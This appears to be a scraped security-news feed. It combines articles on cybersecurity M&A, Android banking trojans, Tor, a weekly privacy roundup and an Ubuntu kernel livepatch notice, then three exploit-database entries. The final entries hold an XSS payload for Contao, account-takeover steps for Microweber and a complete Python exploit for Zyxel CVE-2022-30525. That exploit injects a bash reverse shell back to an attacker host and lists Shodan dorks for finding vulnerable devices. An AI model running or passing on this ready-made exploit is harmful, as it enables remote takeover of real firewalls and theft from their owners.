But valuations have dropped — and investors are paying closer attention to revenues and profitability, industry analysts say.

Cloud security vendor Lacework's recent announcement that it will reduce head count as part of a restructuring plan — just months after it secured $1.3 billion in a record-setting funding round — may have shocked the high-flying cybersecurity sector, but industry analysts say the layoffs do not signal any broad, imminent industry slowdown.

General economic conditions appear to have made investors a bit more cautious, however: Private equity (PE) investments — which accounted for nearly 40% of merger and acquisition activity last year — are down compared with the same period in 2021, as are company valuations overall.

Even so, M&A and venture capital activity in the cybersecurity industry remains robust and shows little sign of a major slowdown. Just in the last few days, for instance, ReliaQuest announced plans to purchase Digital Shadows for $160 million; Netskope acquired WootCloud for an undisclosed sum; and Lookout acquired SaferPass. In late May, Broadcom announced its intent to buy VMware for $61 billion in a deal that, if approved, will bring VMware's Carbon Black security under Broadcom's roof.

**Multiple Drivers**

"There are multiple dynamics at play for M&A" activity in the cybersecurity space, says Fernando Montenegro, an analyst with Omdia. "The established vendor being acquired for their cash flow. The adjacent technology being acquired by a security vendor to enter a market. The technology tuck-in and/or 'acqui-hire' into an existing vendor," he adds. Expect VCs, private equity, and corporate development teams to be a little more cautious, but still active, he notes.

"The industry has had a strong pace of acquisitions and fundings over the years, and we expect that to continue," Montenegro says. "What is changing is that there appears to be much more focus on demonstrating actual capabilities and momentum while being mindful of run rate."

There's also the understanding that too-large funding rounds raise expectations on delivery that may be more difficult to attain in a tightening economic environment, he notes.

Richard Stiennon, chief research analyst at IT-Harvest, says Lacework's decision to downsize and restructure may, in a way, be the result of its own success. The company experienced hypergrowth of some 272% last year and went on a hiring spree. After that, the company might have thought it wise to pause and consolidate while it catches up with expectations on sales growth, Stiennon explains. "There is categorically no broad consolidation in cybersecurity and there will not be until threat actors give up and go home," he says. "We will always need new ways to counter new threats."

That said, the antivirus space for the first time is now truly consolidating, according to Stiennon. Thanks to Microsoft giving away good-enough security with Windows Defender and the availability of stronger endpoint protection capabilities from vendors such as CrowdStrike and SentinelOne, the traditional AV vendors are fading away, he says.

**Fast and Furious Pace**

Data that S&P Global Market Intelligence compiled earlier this year showed there were 42 cybersecurity transactions through March 18, 2022, with a median deal value of some $97 million. Google's $5.4 billion purchase of Mandiant was easily the biggest of those deals and accounted for most of the $6.77 billion in total transaction value of announced deals in the cybersecurity industry through that date. In comparison, there were 36 transactions over the same period in 2021, with a median deal value of $185 million. In all, in the first quarter of 2022 there were 59 deals compared with 49 last year. But total deal value at $9.3 billion was significantly smaller than last year's $17.6 billion, according to S&P Global Market Intelligence.

Rising interest rates, inflation, and concerns over potential economic headwinds appear to have driven down security vendor valuations compared with last year, says Garrett Bekker, an analyst with S&P Global Market Intelligence. Even so, investors appear willing to pay hefty multiples to acquire security firms and the appetite for buying them does not appear to have diminished significantly, he says. That's because most existing drivers remain in place, such as cloud adoption, the move to zero-trust access models, and the proliferation of ransomware and other malware.

One potential red flag is the slowdown in private equity investments so far this year, Bekker says. For the past two decades, there has been a steady increase in PE-funded mergers and acquisitions — from 40 in 2002 to 80 in 2010, and 209 in 2021 — or 37% of all transactions in the space, he says. There has been a near 20% drop-off in PE transactions in 2022 compared with the same period last year, Bekker says. 

"It's a fairly large drop-off," he notes. "We'll be looking to see whether that persists or is an aberration."

**Closer Scrutiny**

Speculation about potential recession and recent turmoil with tech equities is causing venture investors to scrutinize funding more carefully, says Joseph Blankenship, an analyst with Forrester Research. Many investors are also advising the firms they've invested in to slow their burn rate and concentrate on building revenue, with an eye toward profitability. "I do predict that the increased scrutiny, reduced risk appetite, and decreased funding will lead to fewer startups entering the cybersecurity market." It will also push existing firms to find faster exits.

"What we’re seeing now is a continuation of the M&A activity," Blankenship says, At the same time, he adds, buyers are looking to consolidate vendors and the technology portfolios from major cybersecurity vendors are more attractive than they've been previously.

Cybersecurity M&A Activity Shows No Signs of Slowdown

10 of the most prolific mobile banking trojans have set their eyes on 639 financial applications that are available on the Google Play Store and have been cumulatively downloaded over 1.01 billion times.
Some of the most targeted apps include Walmart-backed PhonePe, Binance, Cash App, Garanti BBVA Mobile, La Banque Postale, Ma Banque, Caf - Mon Compte, Postepay, and BBVA México. These apps alone

10 of the most prolific mobile banking trojans have set their eyes on 639 financial applications that are available on the Google Play Store and have been cumulatively downloaded over 1.01 billion times.

Some of the most targeted apps include Walmart-backed PhonePe, Binance, Cash App, Garanti BBVA Mobile, La Banque Postale, Ma Banque, Caf - Mon Compte, Postepay, and BBVA México. These apps alone account for more than 260 million downloads from the official app marketplace.

Of the 639 apps tracked, 121 are based in the U.S., followed by the U.K. (55), Italy (43), Turkey (34), Australia (33), France (31), Spain (29), and Portugal (27).

"TeaBot is targeting 410 of the 639 applications tracked," mobile security company Zimperium said in a new analysis of Android threats during the first half of 2022. "Octo targets 324 of the 639 applications tracked and is the only one targeting popular, non-financial applications for credential theft."

Aside from TeaBot (Anatsa) and Octo (Exobot), other prominent banking trojans include BianLian, Coper, EventBot, FluBot (Cabassous), Medusa, SharkBot, and Xenomorph.

FluBot is also considered to be an aggressive variant of Cabassous, not to mention hitching its distribution wagon to serve Medusa, another mobile banking trojan that can gain near-complete control over a user's device. Last week, Europol announced the dismantling of infrastructure behind FluBot.

These malicious remote access tools, while hiding behind the cloak of benign-looking apps, are designed to target mobile financial applications in an attempt to carry out on-device fraud and siphon funds directly from the victim's accounts.

In addition, the rogue apps are equipped with the ability to evade detection by often hiding their icons from the home screen and are known to log keystrokes, capture clipboard data, and abuse accessibility services permissions to pursue their objectives such as credential theft.

This involves the use of overlay attacks, pointing a victim to a fake banking login page that's displayed atop legitimate financial apps and can be used to steal the credentials entered.

Consequences of such attacks can range from data theft and financial fraud to regulatory fines and loss of customer trust.

"In the past decade, the financial industry moved completely to mobile for its banking and payments service and stock trading," the researchers said. "While this transition brings increased convenience and new options to consumers, it also introduces novel fraud risks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

10 Most Prolific Banking Trojans Targeting Hundreds of Financial Apps with Over a Billion Users

This week on Lock and Code, we talk about the often-undiscussed security benefits of Tor networking, also called onion networking. 
The post Tor’s (security) role in the future of the Internet, with Alec Muffett appeared first on Malwarebytes Labs.

Tor has a storied reputation in the world of online privacy. The open-source project lets people browse the Internet more anonymously by routing their traffic across different nodes before making a final connection between their device and a desired website. It’s something we’ve discussed previously on Lock and Code, and something that, sometimes, gets a bad reputation because of its relationship to the “dark web.”

But for all the valid discussion about online anonymity, encryption, and privacy, Tor has an entirely different value proposition for people who build and maintain websites, and that is one of security. As explained by our guest Alec Muffett on today’s episode of Lock and Code, hosted by David Ruiz, utilizing Tor can provide organizations with an entirely separate networking stack. And this isn’t just a boon for networking diversity, but also security, Muffett explains.

Under our current system that relies on TCP/IP and HTTP (and increasingly HTTPS), whenever a user types a URL into an address bar in their web browser, multiple security risks are present. A user’s traffic can be intercepted, redirected to another server, routed through another country and surveilled, and, as Muffett explained, for website operators, their DNS servers can be tampered with.

“There are so many security risks up the stack,” Muffett said. “Whereas with onion networking, with Tor networking, the thing that you type into the web browser bar is the cryptographic key of the website that you want to talk to.”

Muffett continued:

> It’s from you to them, end-to-end secure.”

Today, on the Lock and Code podcast, we speak with Muffett about the security benefits of onion networking, why an organization would want to launch an onion site for its service, and whether every site in the future should utilize Tor.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes, resources, and credits:_

**Why and How you should start using Onion Networking**: 

**How WhatsApp uses metadata analysis for spam and abuse fighting**:

Alec Muffett’s blog and about page

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Tor’s (security) role in the future of the Internet, with Alec Muffett

Plus: The US admits to cyber operations supporting Ukraine, SCOTUS investigates its own, and a Michael Flynn surveillance mystery is solved.

Not to freak out anyone, but there's a serious flaw in all supported versions of Microsoft Windows that allows attackers to take over your machine. The so-called Follina vulnerability can be exploited using a weaponized Word document, and security researchers say they've already spotted government-backed hackers using this attack in the wild. Fingers crossed that Microsoft, which has downplayed the severity of the flaw, issues a patch soon.

Speaking of patches, everything from Apple's iOS and Google Android to Chrome, Firefox, and Zoom received major security updates in May. Check out our complete list of available updates to see which apps you need to attend to as soon as possible.

We also explored the race to protect your voice from hackers and corporate greed. And we tried to unravel the mystery of China's sudden warnings about US state-sponsored hackers going after Chinese systems, despite the fact that these hacks are well known and happened ages ago.

Meanwhile, in India, the country's telecom regulator is preparing to crack down on robocall spam and scammers by requiring callers' names to appear on caller ID. The idea sounds good—until you realize the privacy implications and the fact that such a plan might not even work.

Finally, because nothing's sacred, Canada's privacy commissioner this week announced that a mobile app for Tim Hortons, the beloved coffee chain, illegally spied on its users' locations. The app, which used location-tracking tech from US-based firm Radar, collected a constant stream of users' location data—checking as frequently as every 2.5 minutes—and would create an “event” anytime a user “entered or left” their home, office, major sports complex, or rival coffee shop, according to the commissioner's office.

But that's not all, folks. Each week, we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there. 

If you lived in Illinois between May 1, 2015, and April 25, 2022, Google may owe you some cash. The company recently settled a class-action lawsuit over a feature in the Google Photos app that categorized photos of people based on their faces. The problem? According to the lawsuit, Google failed to receive consent to do so from millions of users, a violation of the state's Biometric Information Privacy Act. Google did not admit fault as part of the settlement, but it has agreed to pay $100 million and put in place measures to avoid further privacy violations. If you were an Illinois resident during that seven-year period and appeared in a photo uploaded to the Google Photos app, you can file a claim for your piece of the $100 million pie.

The blurry line between “at war” and “not at war” grew even fuzzier this week. General Paul Nakasone, the head of US Cyber Command and the NSA, told Sky News that the US military has conducted “a series of operations across the full spectrum," including “offensive, defensive, and information operations” in support of Ukraine's defense against Russia's invasion. Nakasone declined to detail what these operations entailed but assured that they were perfectly legal. The general's admission coincides with the US agreeing to provide Ukraine with advanced missile systems with a range of 50 miles. The Kremlin responded to this news by saying the US was “pouring fuel on the fire.”

As part of the US Supreme Court's investigation into the leak of a draft opinion overturning guaranteed abortion rights in the United States, the Court's clerks have been asked to turn over their private phone records and sign an affidavit, according to CNN. The “unprecedented” move is jarring for civil liberties advocates. As Albert Fox Cahn, found of the Surveillance Technology Oversight Project, writes for WIRED: “The intrusive probe reveals a disturbing about-face from the Supreme Court, and particularly Chief Justice John Roberts, on surveillance powers.” The clerks, meanwhile, are reportedly hesitant to refuse the demand for phone records or seek legal counsel for fear of being wrongly suspected of leaking the draft opinion to _Politico_ reporters.

A Trump-era conspiracy theory can finally be put to rest—theoretically, at least. A 52-page classified report into the “unmasking” of Michael Flynn, a former US national security adviser to Donald Trump, has now been made public thanks to a Freedom of Information Act request filed by Jason Leopold of Buzzfeed News. Republicans have long accused Obama administration operatives of revealing Flynn's name in classified material for political purposes in the lead-up to the 2016 election. But the Justice Department report, prepared by former US Attorney John Brash, found “no evidence that unmasking requests were made for political purposes or other inappropriate reasons during the 2016 election period or the ensuing transition period." Flynn ultimately resigned in 2017 for misleading vice president Mike Pence about Flynn’s calls with Russia's ambassador to the US.

Google May Owe You a Chunk of $100 Million

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 27 and June 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for May 27 to June 3

It was discovered that a race condition existed in the network scheduling subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oem - Linux kernel for OEM systems

Details

It was discovered that a race condition existed in the network  
scheduling subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2021-39713)

Yiqi Sun and Kevin Wang discovered that the cgroups implementation in  
the Linux kernel did not properly restrict access to the cgroups v1  
release_agent feature. A local attacker could use this to gain  
administrative privileges. (CVE-2022-0492)

It was discovered that the network traffic control implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-1055)

Bing-Jhong Billy Jheng discovered that the io_uring subsystem in the  
Linux kernel contained in integer overflow. A local attacker could use  
this to cause a denial of service (system crash) or execute arbitrary  
code. (CVE-2022-1116)

It was discovered that the Linux kernel did not properly restrict access  
to the kernel debugger when booted in secure boot environments. A  
privileged attacker could use this to bypass UEFI Secure Boot  
restrictions. (CVE-2022-21499)

Kyle Zeng discovered that the Network Queuing and Scheduling subsystem  
of the Linux kernel did not properly perform reference counting in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-29581)

Jann Horn discovered that the Linux kernel did not properly enforce  
seccomp restrictions in some situations. A local attacker could use this  
to bypass intended seccomp sandbox restrictions. (CVE-2022-30594)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 86.3  
    azure - 86.3  
    gcp - 86.3  
    generic - 86.3  
    gke - 86.3  
    gkeop - 86.3  
    ibm - 86.3  
    lowlatency - 86.3

Ubuntu 18.04 LTS  
    aws - 86.3  
    azure - 86.3  
    gcp - 86.3  
    generic - 86.3  
    gke - 86.3  
    gkeop - 86.3  
    ibm - 86.3  
    lowlatency - 86.3  
    oem - 86.3

Ubuntu 16.04 ESM  
    aws - 86.3  
    azure - 86.3  
    gcp - 86.3  
    generic - 86.3  
    lowlatency - 86.3

Ubuntu 22.04 LTS  
    gcp - 86.4  
    generic - 86.4  
    gke - 86.4  
    ibm - 86.4  
    lowlatency - 86.4

Ubuntu 14.04 ESM  
    generic - 86.3  
    lowlatency - 86.3

Support Information

Kernels older than the levels listed below do not receive livepatch  
updates. If you are running a kernel version earlier than the one listed  
below, please upgrade your kernel as soon as possible.

Ubuntu 20.04 LTS  
    linux-aws - 5.4.0-1009  
    linux-aws - 5.4.0-1061  
    linux-azure - 5.4.0-1010  
    linux-gcp - 5.4.0-1009  
    linux-gke - 5.4.0-1033  
    linux-gkeop - 5.4.0-1009  
    linux-hwe - 5.15.0-0  
    linux-ibm - 5.4.0-1009  
    linux-oem - 5.4.0-26  
    linux - 5.4.0-26

Ubuntu 18.04 LTS  
    linux-aws-5.4 - 5.4.0-1069  
    linux-aws - 4.15.0-1054  
    linux-azure-4.15 - 4.15.0-1115  
    linux-azure-5.4 - 5.4.0-1069  
    linux-gcp-4.15 - 4.15.0-1121  
    linux-gcp-5.4 - 5.4.0-1069  
    linux-gke-4.15 - 4.15.0-1076  
    linux-gke-5.4 - 5.4.0-1009  
    linux-gkeop-5.4 - 5.4.0-1007  
    linux-hwe-5.4 - 5.4.0-26  
    linux-ibm-5.4 - 5.4.0-1009  
    linux-oem - 4.15.0-1063  
    linux - 4.15.0-69

Ubuntu 16.04 ESM  
    linux-aws-hwe - 4.15.0-1126  
    linux-aws - 4.4.0-1098  
    linux-aws - 4.4.0-1129  
    linux-azure - 4.15.0-1063  
    linux-azure - 4.15.0-1078  
    linux-azure - 4.15.0-1114  
    linux-gcp - 4.15.0-1118  
    linux-hwe - 4.15.0-143  
    linux-hwe - 4.15.0-69  
    linux - 4.4.0-168  
    linux - 4.4.0-211

Ubuntu 22.04 LTS  
    linux-aws - 5.15.0-1000  
    linux-azure - 5.15.0-1000  
    linux-gcp - 5.15.0-1000  
    linux-gke - 5.15.0-1000  
    linux-ibm - 5.15.0-1000  
    linux - 5.15.0-24  
    linux - 5.15.0-25

Ubuntu 14.04 ESM  
    linux-lts-xenial - 4.4.0-168

References

-   CVE-2021-39713  
-   CVE-2022-0492  
-   CVE-2022-1055  
-   CVE-2022-1116  
-   CVE-2022-21499  
-   CVE-2022-29581  
-   CVE-2022-30594

Kernel Live Patch Security Notice LSN-0086-1

Contao version 4.13.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)# Google Dork: NA# Date: 04/28/2022# Exploit Author: Chetanya Sharma @AggressiveUser# Vendor Homepage: https://contao.org/en/# Software Link: https://github.com/contao/contao/releases/tag/4.13.2# Version: [ 4.13.2 ] # Tested on: [KALI OS]# CVE : CVE-2022-1588# References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html---------------Steps to reproduce:Navigate to the below URLURL: https://localhost/contao/"><svg//onload=alert(112233)>

Contao 4.13.2 Cross Site Scripting

Microweber CMS versions 1.2.15 and below suffer from an account takeover vulnerability.

    # Exploit Title: Microweber CMS 1.2.15 - Account Takeover# Date: 2022-05-09# Exploit Author: Manojkumar J# Vendor Homepage: https://github.com/microweber/microweber# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15# Version: <=1.2.15# Tested on: Windows10# CVE : CVE-2022-1631# Description:Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 OauthMisconfiguration Leads To Account Takeover.# Steps to exploit:1. Create an account with the victim's email address.Register endpoint: https://target-website.com/register#2. When the victim tries to login with default Oauth providers like Google,Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)with that same e-mail id that we created account before, via this way wecan take over the victim's account with the recently created logincredentials.

Microweber CMS 1.2.15 Account Takeover

Zyxel USG FLEX version 5.21 suffers from a command injection vulnerability.

    # Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"# Date: May 18th 2022# Exploit Author: Valentin Lobstein# Vendor Homepage: https://www.zyxel.com# Version: ZLD5.00 thru ZLD5.21# Tested on: Linux# CVE: CVE-2022-30525from requests.packages.urllib3.exceptions import InsecureRequestWarningimport sysimport jsonimport base64import requestsimport argparseparser = argparse.ArgumentParser(    prog="CVE-2022-30525.py",    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",)parser.add_argument("-u", dest="url", help="Specify target URL")parser.add_argument("-r", dest="host", help="Specify Remote host")parser.add_argument("-p", dest="port", help="Specify Remote port")args = parser.parse_args()banner = (    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"    "biA6KSApCg==")def main():    print("\n" + base64.b64decode(banner).decode("utf-8"))    if None in vars(args).values():        print(f"[!] Please enter all parameters !")        parser.print_help()        sys.exit()    if "http" not in args.url:        args.url = "https://" + args.url    args.url += "/ztp/cgi-bin/handler"    exploit(args.url, args.host, args.port)def exploit(url, host, port):    headers = {        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",        "Content-Type": "application/json",    }    data = {        "command": "setWanPortSt",        "proto": "dhcp",        "port": "4",        "vlan_tagged": "1",        "vlanid": "5",        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',        "data": "hi",    }    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")    try:        response = requests.post(            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5        )    except (KeyboardInterrupt, requests.exceptions.Timeout):        print("[!] Bye Bye hekcer !")        sys.exit(1)    finally:        try:            print("[!] Can't exploit the target ! Code :", response.status_code)        except:            print("[!] Enjoy your shell !!!")if __name__ == "__main__":    main()

Tag

#google